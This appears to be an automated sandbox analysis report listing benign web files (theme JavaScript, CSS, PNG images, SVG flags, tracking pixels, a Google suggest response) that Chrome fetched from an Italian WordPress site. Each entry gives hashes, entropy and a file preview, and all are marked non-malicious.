                                                                                                                                              Preview:(function($) {.. 'use strict';.... /*-------------------------------------------------------------------------------.. Preloader...-------------------------------------------------------------------------------*/.. $(window).on('load', function() {.. $('.ct-preloader').addClass('hidden');.. });.... /*-------------------------------------------------------------------------------.. Aside Menu...-------------------------------------------------------------------------------*/.. $(".aside-trigger").on('click', function() {.. $(".main-aside").toggleClass('open');.. });.. $(".main-aside .menu-item-has-children > a").on('click', function(e) {.. var submenu = $(this).next(".submenu");.. e.preventDefault();.... submenu.slideToggle(200);.. }).... /*-------------------------------------------------------------------------------.. Cart Trigger.. -------------------------------------------------------------------------------*/.. $(".cart-trigger").on('click', function
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):3106
                                                                                                                                              Entropy (8bit):5.0805450955042755
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:EfprP714GU1LYzbW/sjSFEuMB3g9iGyIgasXljGC:epeGs6W/s4k3OgHpGC
                                                                                                                                              MD5:20E8490FAB0DCF7557A5C8B54494DB6F
                                                                                                                                              SHA1:285DB746DFC0D43B9CA42F8D65B69C908FF72CA5
                                                                                                                                              SHA-256:FBE820B6140AD28E86F34FFAE507D807CF591A22697A05B71958F2014E96A9E4
                                                                                                                                              SHA-512:2B3DA277E8DF9273F672EC262B9700090612A9EF664899C9AC689FB815C708F787FBDC0DDEFE9037ADAA9C8384DE152E53B59EE017918A2E9AD1EB7D81BF90EB
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/plugins/cookie-law-info/legacy/public/css/cookie-law-info-public.css?ver=3.0.5
                                                                                                                                              Preview:#cookie-law-info-bar {..font-size: 15px;..margin: 0 auto;..padding: 12px 10px;..position: absolute;..text-align: center;..box-sizing: border-box;..width:100%;..z-index: 9999;../* box-shadow:rgba(0,0,0,.5) 0px 5px 50px; */..display: none;..left:0px;..font-weight:300;..box-shadow: 0 -1px 10px 0 rgba(172, 171, 171, 0.3);.}.#cookie-law-info-again {..font-size: 10pt;..margin: 0;..padding:5px 10px;..text-align: center;..z-index: 9999;..cursor: pointer;..box-shadow: #161616 2px 2px 5px 2px;.}.#cookie-law-info-bar span {..vertical-align: middle;.}../** Buttons (http://papermashup.com/demos/css-buttons) */..cli-plugin-button, .cli-plugin-button:visited {..display: inline-block;..padding: 9px 12px;..color: #fff;..text-decoration: none;..position: relative;..cursor: pointer;..margin-left: 5px;..text-decoration: none;.}..cli-plugin-main-link {..margin-left:0px;..font-weight: 550; text-decoration: underline;.}..cli-plugin-button:hover {..background-color: #111;..color: #fff;..text-decoration: none;
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 1222 x 627, 8-bit/color RGBA, non-interlaced
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1490857
                                                                                                                                              Entropy (8bit):7.989958536302157
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:SEOyLri+sYNFU9QgsEJhobTPgUXedbQOyxuh+ORCoJC5VXcy2Q9O6j:/zBsqKigsEkbTgUXedspURCmnyZ9Hj
                                                                                                                                              MD5:2AB043490AC102D475BF438F716917C0
                                                                                                                                              SHA1:E2CA42DBE4B58C9732CB8B6857374CA65CE8B26C
                                                                                                                                              SHA-256:090E5EEF655D7585F9CB8A875CC1F0AD9D1E55EDA45086F399BBEC7A5502C17A
                                                                                                                                              SHA-512:4488A2A31BD374D5DECDF282CE3CDB05F927D6C8686DB8ED3A64C75F964953059A598D49938D2AE81077C170371A88CDAC663E6C9D8C63647D8F134A618393EF
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.PNG........IHDR.......s........0...KiCCPICC Profile..X..y.8.]....|....<.d..y.g.....C.$c.BH%.+.B%".J.zH.H.J..B..z..y.....}].....k.....un...|##.....G.P.L....=..s..x...\...H};;+.......a.m.Oe6d.w...0..D....`...M...U.P..Hj.....P|L...+`....8s..m..../m.89......./5...~...G..e./.}...J..,(...........y"a.1.5.......~.d.....[s.,8#Jtd....;......[.(\i..f..s..6...r...x>.....D....o...A..5s..Gp...a..V.....Y...&.a6V.t.@..9....H..;........<.....u!..........M....cC.......0...O.vr.1...q......X6:..r.G+1...7.5.a.~a.;.D..l.G..RM........y:.bn.....;.m...M......? B.....h7..s..02.;r. ..q[.......(Bd..6?J0 .t...c..8..(..xAn.G.F..9m.J....u.X.C`..A,\..n..(O.[.._[=&..PA...2..#\7{".#H..`.....3....q0.....S..n..m...30... ....9*.6....P.K./\..ap......S......mJ.o....91..#....#..D.4QV.S...(5...y...A.._......(i..Yi.&`.&..../P..Le..J...KF..8..J....5+.T.m.7.../..1..Dc../.G...zx......W.#e......~..m........}....7'2.....D. .-...lE."om.?........a.PX......'......o...$l...pw..*%(8._......#...
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 2056 x 494, 8-bit/color RGBA, non-interlaced
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):97851
                                                                                                                                              Entropy (8bit):7.418342536849731
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:gNDhIrbNufH3QrUzXvDAnd2qJZfk3kcQwxZqXsBwMY9ZbjgAQH7AUUUUUQ:gzIrbwfHmUzDycAskpwxwXswFZbK7AUc
                                                                                                                                              MD5:B44FCDE83AC201F3581D012822B45D97
                                                                                                                                              SHA1:02C9071FBBE144A620072CE75942F23506F520C9
                                                                                                                                              SHA-256:94AAFBBDF656C831AC157DB9D42508A5485FABA8073A611D1AF2C941AA5EDE04
                                                                                                                                              SHA-512:4B3CEE10052785993D5BC3CC20CC8C5A247CE8751DF7962D4C15754EB461642F258D9256F6C5C2C18961285C1447EF18457AEF7537A03C265A9FC7B908969F6D
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.PNG........IHDR.....................pHYs.................iCCPPhotoshop ICC profile..x..wT.Y.......-!.RBo....k...FH ...B.......X...eDFD... cA,X..{..AE]..6T....{v..=g.s.9..{........Nr.R1...-..b...I.)l.. .......\.ott8...p.....6\.T..[...sy.H4...sy...1...'....$.0^*......`..S..-...Lr=.0.&............D.re...].`...r..'....E.....x.\>.M........h..`..O>...LSzr..%O......Q.T.].....+..0...P....$..&kI..%i.QS,.O......!.S...O.b>7 l..Y.S.M...9qS,[.....#....%....Nq.(.3....)..%DNqnVl......S.({..)g.....K...Q.....G...#..)}......J=7/VyV..S....i.h.."..<y.29.....r.H ..}.Rq:.#...b;...$%..'......@XW...N....D0.q..N<.`|.........)dy.......P.&h.>.....8...@ .B..A2,...!.d...`..C)l..P......!8.mp...E..}p......K...0. ...#.D.1@L.k..qE..@$..A..TD.H..R..CJ.2...4"."'...e....."#.[....4...f.l...E..8t!*@s.|...V.u.A..=.^Eo...Kt.....0C..s...(,...d.*.....f....n`..+.3..c..8.........rp.p.qU...V.y... n...O.....x.>././...+..............E0'..B..L...F..B....O."...Dm.5..E....b.N.A...u.0...J2 9..H)$.i-..t.t.t
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):3874
                                                                                                                                              Entropy (8bit):4.868159924024015
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:UpEuZVBaSROpC2naxByjCdGUXoJoxKycxQQhzAY1RTspAQ1mOy:4bZq/4joJoTcfbTEof
                                                                                                                                              MD5:AC668671BD365BB72715B266F9271104
                                                                                                                                              SHA1:C709DE79489609DCD4F3E997A3881122C20A1AAA
                                                                                                                                              SHA-256:6FFCCFD49D5B0B8C3483C78672A281C00DFB05651E7BDA6495152EABEF75058C
                                                                                                                                              SHA-512:25938F838C08653CB92BF8D95370BF5ECC9EACA39958E441E3FE51BDFA71C7C89016395E0F00BEA6E948DF864498930FC7F0BAEF1C8528A73EACB8C2FAA89BB2
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:(function($).{ .."use strict";..$.avia_utilities = $.avia_utilities || {};....$(document).ready(function(). {.... //activates the sticky submenu...$.avia_utilities = $.avia_utilities || {};. if($.avia_utilities.avia_sticky_submenu)...$.avia_utilities.avia_sticky_submenu(); . });......$.avia_utilities.avia_sticky_submenu = function()..{...var win ..= $(window),....html ..= $('html:first'),....header .= $('.html_header_top.html_header_sticky #header'),....html_margin = parseInt( $('html:first').css('margin-top'), 10),....setWitdth.= $('.html_header_sidebar #main, .boxed #main'),....menus..= $('.av-submenu-container'),....bordermod.= html.is('.html_minimal_header') ? 0 : 1,....fixed_frame.= $('.av-frame-top').height(),....calc_margin.= function()....{.....html_margin = parseInt( html.css('margin-top'), 10);.....if(!$('.mobile_menu_toggle:visible').length).....{......$('.av-open-submenu').removeClass('av-open-submenu');.....}..........menus.filter('.av-sticky-submenu').each(f
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):2939
                                                                                                                                              Entropy (8bit):4.941391789017286
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:2z4A0lVGeY/taXF7dIihItut4n5FkIoY0rfMQgradiyOIf:2z4DlVGz/taXF7dphItutczSY0rfMQgm
                                                                                                                                              MD5:EA8D6B21B144DFD4101BD9D2F57FD07F
                                                                                                                                              SHA1:038D9D975D6A6783E04D564E5924ED2E65F0FF9B
                                                                                                                                              SHA-256:A7C3452D5BD50C5D4F1F12F2EBEA924C57D1BA2B6A6193227CF984655D58E477
                                                                                                                                              SHA-512:281073FAF73BAB703C695153E484E9737CB04CAA0750E2156673D0B06B0D0072866A27940220B119C10884A21D9FEB1AAA997845B43D5DF07367208F16E6B41F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/countdown/countdown.js?ver=6.0.9
                                                                                                                                              Preview:// -------------------------------------------------------------------------------------------.// .// AVIA Countdown.// .// -------------------------------------------------------------------------------------------.(function($).{ .."use strict";....var _units.= ['weeks','days','hours','minutes','seconds'],..._second = 1000,..._minute = _second * 60,..._hour .= _minute * 60,..._day .= _hour * 24,..._week.= _day * 7,....ticker.= function(_self)...{....var _time..= {},....._now ..= new Date(),....._timestamp = _self.end - _now;........if(_timestamp <= 0)....{.....clearInterval(_self.countdown);.....return;....}........._self.time.weeks .= Math.floor( _timestamp / _week);...._self.time.days .= Math.floor((_timestamp % _week) / _day);...._self.time.hours.= Math.floor((_timestamp % _day) / _hour); ...._self.time.minutes .= Math.floor((_timestamp % _hour) / _minute); ...._self.time.seconds .= Math.floor((_timestamp % _minute) / _second); ........switch(_self.data.maximum)....{.....case 1:
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 1222 x 630, 8-bit/color RGBA, non-interlaced
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1268031
                                                                                                                                              Entropy (8bit):7.988423203500793
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:IVkYjgK1/q5Tj9LQQc5XrXeKKme+zVZmA7CUd3R8wD+J8IHjNH2BEKR/1RDQ/4:IWYjC5Tj9cQm7nKmXJZD7CEXD+J8AcNB
                                                                                                                                              MD5:70002FB6B8C65AA21997EF20178127D3
                                                                                                                                              SHA1:6E08F68FF4C2419835E30836FBE33C6DBD42F346
                                                                                                                                              SHA-256:C794957D89A7FC2CF33573523070167A76ED63E72C8296F316302AFD61FFC7E8
                                                                                                                                              SHA-512:1E836E887A61EE0EA0F2A41223C8B3C356E45E0A961D48169872FB71F555F76EBAC8866AEE8BF04037EA0FF02A9C8897E6F8C5911073F645B05AFFD4BD533FE3
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.PNG........IHDR.......v.............IDATx.t.].,K.-..3...kW...W.%$...u.........x..._.A..9.....f<.s.\u.J[k.5.....n6l|.....5..@...`.H9C p....rB.1.BR.....R..c..........y..>Ps."#k.W-(..(....Q3T.GI..g9.i.)#..Z.J*.9..()!'.B.r.BP..3A..n.&.L..8k...sGI..........T+D.*......P.{...&...BD...S.\..4......A....../03.....)..P.D0.....7.4....p..........@0.a.!%.4....0.AE1.@.%.....OU~......C.L..Q..I.>...*D.%g.9.I0.Qr.. I......M....GJ."..@D....)%......s.R0.#.....CU..07..>......TM....x.4.....".U...g.=..X.....l.7...O~......h....\..?.5....Za...?gp...............w.......s...u..a6a>1F....1m.........'.l...OL...x...x...O...x._..'............).;g .xf.P.._8._Q..~.<N...<.@..5W<..L....PQ....5.H9CE HH....0E..I.\..I....B.q..I.D.T.~...|.o...}/u...{&..4^s?..T4.....E.,.$...".k....51G...|.`..|L.[<.../.10z..c..>x.}.Yrw\m..D..P.L..8J.....:.q....s...iPu.,Hj(I!b()....ums..._H.......x..1.r>!n.np(.2....TOh.x..J} ..Z+....8jE..Y3F..t.~..s...a..V..$@.-"...f.,.....RJ.U.q....(%.l@2?K..6....d\......j..O
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):8442
                                                                                                                                              Entropy (8bit):4.883712838949273
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:GIWPKhYRU1hU0+Z9BQR4hqcwsUEVqUWAGITIRMLRRMKHKQnhL65b1pZ1nH91rQ7b:mPooU7UbZ9BZNQE2PLavLJJqvH7cv
                                                                                                                                              MD5:D796060840929B29AF732AB67485068A
                                                                                                                                              SHA1:BD4A5D4D0AD834B5AC95D95FEF448E070BBDDFE5
                                                                                                                                              SHA-256:729B2AEEB7C20E1A31A624DCF851D7CFE83551465820417D5531880C81FBFBED
                                                                                                                                              SHA-512:93490925D406B6CA471E074BCC3B62833B218280BF63835B2723DAE61F126527D325998954605872690373B38CF1C111E19400E1BFC269AF087909DF232C3820
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_accordion/slideshow_accordion.js?ver=6.0.9
                                                                                                                                              Preview:(function($).{.."use strict";.// -------------------------------------------------------------------------------------------.// Aviaccordion Slideshow .// .// accordion slider script.// -------------------------------------------------------------------------------------------...$.AviaccordionSlider = function(options, slider)..{.. this.$slider .= $( slider );.. this.$inner. .= this.$slider.find('.aviaccordion-inner');.. this.$slides.= this.$inner.find('.aviaccordion-slide');.. this.$images.= this.$inner.find('.aviaccordion-image');.. this.$last..= this.$slides.filter(':last');.. this.$titles .= this.$slider.find('.aviaccordion-preview');.. this.$titlePos = this.$slider.find('.aviaccordion-preview-title-pos');.. this.$titleWrap = this.$slider.find('.aviaccordion-preview-title-wrap');.. this.$win. .= $( window );.. .. if($.avia_utilities.supported.transition === undefined)...{....$.avia_utilities.supported.transition = $.avia_utilities.supports('t
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):4006
                                                                                                                                              Entropy (8bit):4.938963478269799
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:XN7EnMhRl2bK2bV2bHlvjR50GpRg+XUtp7sRXVm956B/WPc3fsfF5m3KegQb9:DvgO/BZSeJR
                                                                                                                                              MD5:2442B6731365A4C979545B27ED9BA2F3
                                                                                                                                              SHA1:C92CF2BC3DB7D46B429C259AED9913D88A25C223
                                                                                                                                              SHA-256:82877F96AD1B8AF225342B4A42A5B55A44A6AF0D5ADA83F564C0B67AFF631416
                                                                                                                                              SHA-512:15849B2B03CAA8A6FDD99C3FD24FFD81F17301EAC7F3487F1D74F300D85FBFD6232903F7B19815A7A0F57A756374FECBC12D2C827F117A274EE05D704D9831BC
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/gallery_horizontal/gallery_horizontal.css?ver=6.0.9
                                                                                                                                              Preview:../* ======================================================================================================================================================.Horizontal Gallery.====================================================================================================================================================== */...av-horizontal-gallery{..clear:both;..position: relative;..z-index: 1;..overflow: hidden;.}....av-horizontal-gallery-inner{..position: relative;..white-space:nowrap;..opacity: 0;.}...av-horizontal-gallery-slider{..left:0;..position: absolute;..height:100%;..width:100%;.}...av-horizontal-gallery-wrap{..height:100%;..top:0;..display: inline-block;..position: relative;..z-index: 1;..-webkit-user-select: none; ..-moz-user-select: none;..-ms-user-select: none;..user-select: none;..cursor: pointer;..vertical-align: top;.}...av-horizontal-gallery-animated .av-horizontal-gallery-inner{..-webkit-transition: opacity 0.4s ease-in-out;..transition: ..opacity 0.4s ease
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):289
                                                                                                                                              Entropy (8bit):5.03513521833349
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:tI9mc4sltj4JxTqMDMwlRtuuHWqlqRthzXlqRt3fvFjlC:t43t6MwR3xghVg3f5I
                                                                                                                                              MD5:CC4D943DBAC895A562D174FC60D3A8DF
                                                                                                                                              SHA1:43787164AC316DF0A0131E02C83B7970CE5F8C92
                                                                                                                                              SHA-256:C19557A7703C7239BB32690D9166E34F97D9191E567031292B3C1A5E50176B9C
                                                                                                                                              SHA-512:BCF9A5D7FF770551ED37294E7C6246249C8CE4DE2F51E542744751F0FE52E29D9A7BB143C3374764B8E2581E9D9017FD8F245AF5A67462C746221CFF36859D71
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://forms.pienissimo.com/fr.b377e77885d6a93660dc.svg
                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" id="flag-icons-fr" viewBox="0 0 640 480">. <g fill-rule="evenodd" stroke-width="1pt">. <path fill="#fff" d="M0 0h640v480H0z"/>. <path fill="#002654" d="M0 0h213.3v480H0z"/>. <path fill="#ce1126" d="M426.7 0H640v480H426.7z"/>. </g>.</svg>.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):43
                                                                                                                                              Entropy (8bit):2.7374910194847146
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                                              MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                                              SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                                              SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                                              SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://mc.yandex.com/sync_cookie_image_decide?token=10611.DeDvDEkh2b6Its9xbNfPHxCK1804kA6_zZJVWLPPWz07-944RJ_J0kYNra_afEkwU03UV0CHnydP5no6KoQ54vkblvuIBsG-969Amgl-cxtmyCk1lkokidjPnkQ91qsTV1SpIOp7NPyr1RezhjfwvFpEDIXtlvS0spqHmtROf1O5xs8i-DVaMexQjDa336P2d5ZAuPOBzBztdoOKKJl7_8M1xV-u-PMh4JytiHCpED4%2C.xOk8KZm_JWiARvYJ6YX-7hS6gpY%2C
                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):439667
                                                                                                                                              Entropy (8bit):5.243595990242837
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:U0O7cyX0P0ZrBBRiQPRnY+dRNU0o1t1GuYLRr:r0cyXbrXRW+dRNUzpYVr
                                                                                                                                              MD5:8D93196E124D21F268E252119288FBA5
                                                                                                                                              SHA1:24A9D79716B330D2B1F857CA6E6C43CDD9C90339
                                                                                                                                              SHA-256:D26E4EF6147116AD1DCF31B775663F0061C4D8D90C5F521300645B3A3AFC17B5
                                                                                                                                              SHA-512:EBDBE398EE904F83C760184DF65CB3DAA1CA55634AD4C8CE4D9C1267B7B8AAE3B19098A7E06AA2A2D6152BECD0B9AFF7195B20ED80AC3BCA2258D66F746B5E1E
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:function callAppClientiHook(){console.log("callback start");try{OrderPaymentComplete.postMessage("Complete")}catch{console.log("callback lanciato per flutter")}}!function(t,e){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=t.document?e(t,!0):function(t){if(!t.document)throw new Error("jQuery requires a window with a document");return e(t)}:e(t)}("undefined"!=typeof window?window:this,(function(t,e){"use strict";var i=[],n=t.document,o=Object.getPrototypeOf,r=i.slice,s=i.concat,a=i.push,l=i.indexOf,u={},c=u.toString,h=u.hasOwnProperty,d=h.toString,p=d.call(Object),f={},m=function(t){return"function"==typeof t&&"number"!=typeof t.nodeType},g=function(t){return null!=t&&t===t.window},v={type:!0,src:!0,nonce:!0,noModule:!0};function _(t,e,i){var o,r,s=(i=i||n).createElement("script");if(s.text=t,e)for(o in v)(r=e[o]||e.getAttribute&&e.getAttribute(o))&&s.setAttribute(o,r);i.head.appendChild(s).parentNode.removeChild(s)}function y(t){return null==t?t+""
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):283
                                                                                                                                              Entropy (8bit):4.999257877416297
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:tI9mc4sltj4JIC/MDMwlRtuuHWqlqRtz2Z2XYblqRtHFS3Ihg5lC:t43P86MwR3xgzN4gHFSYQI
                                                                                                                                              MD5:AB61F31EDF4AD95B5AE00AFF3BE99197
                                                                                                                                              SHA1:2224F01348B870C064900BCE135BFD7888A5B745
                                                                                                                                              SHA-256:6C62F886220C3BCB0725AC86A62DA7D9A80C33B4525C9BFAFE4F540649FF0090
                                                                                                                                              SHA-512:404B1EBAF730083A2535EE61929A4A6F9A5B2C31707682F06A4936AAC6F94DCE772CC82217CB9E05BB8AAE86B56E76040811DB6FBDD573084A8E34ABF2A66DD2
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://forms.pienissimo.com/ru.7e04b988972d41f5c369.svg
                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" id="flag-icons-ru" viewBox="0 0 640 480">. <g fill-rule="evenodd" stroke-width="1pt">. <path fill="#fff" d="M0 0h640v480H0z"/>. <path fill="#0039a6" d="M0 160h640v320H0z"/>. <path fill="#d52b1e" d="M0 320h640v160H0z"/>. </g>.</svg>.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):809
                                                                                                                                              Entropy (8bit):5.001051426439148
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:7ZwzMWluJWeQg2Q7VwTjMw4jCdDuFfvq0C:90mZt26aujYSFfC0C
                                                                                                                                              MD5:40AF2BEA652F4C521EBDC0CB27F5317F
                                                                                                                                              SHA1:99557859A8D00DF4D80706E14E9F8B224E1F12F7
                                                                                                                                              SHA-256:70F49D696AC849B9B5F3DF0EF9165A7E19EF1FBD318BAE55C3F2D3C4EA15E648
                                                                                                                                              SHA-512:D3DFC8A05F58F75A8BFBD108E160B9E32723321E18BEB74F6A6C79CB9881B8F51B178AC55B05345672B2D50BF32FB1EF38636A08BF8D2ADE327D1126348BBF2B
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-wpml/wpml-mod.css?ver=4.5
                                                                                                                                              Preview:.avia_wpml_language_switch {.position: relative;.padding: 0px 0 0 10px;.height: 30px;.line-height: 36px;.margin: 0 0 0 0;.z-index: 151;.-webkit-backface-visibility: hidden;.top:-2px;.right:0;.overflow: hidden;.}...sub_menu ul{float:left;}..#top ul.avia_wpml_language_switch li{.float:left;.margin: 0px 0px 0px 5px;.padding:0;.border:none;.}...avia_wpml_language_switch li:hover{.opacity: 0.8;.}...avia_wpml_language_switch li span{.display:none;.}...avia_wpml_language_switch li .language_flag{.display:block;.}...avia_wpml_language_switch li .language_flag img{.display:inline-block;.border:1px solid rgba(255,255,255,0.2);.}...#icl_lang_sel_widget{.overflow:visible;.z-index:20;.}...html_header_sidebar #top .avia_wpml_language_switch{border-bottom-style:solid; border-bottom-width:1px; padding:0px 10px;}.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (844)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):849
                                                                                                                                              Entropy (8bit):5.186239068229883
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:QuwkdKRoBHslgT9lCuABATWApquoB7HHHHHHHYqmffffffo:QuwkdooKlgZ01BAqDuSEqmffffffo
                                                                                                                                              MD5:8D1DE894A3D512B933588C3572A67384
                                                                                                                                              SHA1:CEAD75134A0EFBDE301C520DB493CC5BA1917166
                                                                                                                                              SHA-256:72C615B7ADA97580ADEE5DC40CE0F9A42E0D95E43A92AEEFBB7096C4B4C1F3C0
                                                                                                                                              SHA-512:3B2013246F7A06ECEB27D878B043DEDF3817C2A14828C714A7AF76F8407114259B2DBA3EA8C2021F2CDA5775DF2ED97CA91C2F76F04B3BE225437D09897484E5
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                              Preview:)]}'.["",["pokemon tcg pocket mechanic frustrations","jared spurgeon injury","costco dei initiatives","samsung galaxy galaxy s25 ultra","upcoming federal holidays","lake effect snow warning cleveland ohio","when can i file taxes 2025","marvel 2025 movies"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":2143250258194658214,"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (1395)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):96116
                                                                                                                                              Entropy (8bit):5.488901541006978
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:ON+4tY0S2yvGnf4vA6s/RXIGDXO9qJUMKur0K3niBBrltmCw3wnWs/P:T2yvefrtJUEgK3Cvw3wWs/P
                                                                                                                                              MD5:57DF1CB88D09067EA03F95E6BB3C8A2E
                                                                                                                                              SHA1:5C67CDEB3DCA1AE7227E097A0607916750C842B5
                                                                                                                                              SHA-256:9EA2C7162BA140DF081DA96940760F883A20B9806DE7F424770B5DF3D82B5C08
                                                                                                                                              SHA-512:A4AD4392895D7A9601C4E93D56C9712542FB78234253B330D39AE5384B131D8B04A3B5A4AC7B6AA9D1B37F7A194F769887260B828106123010E2695C9118EDFD
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0"
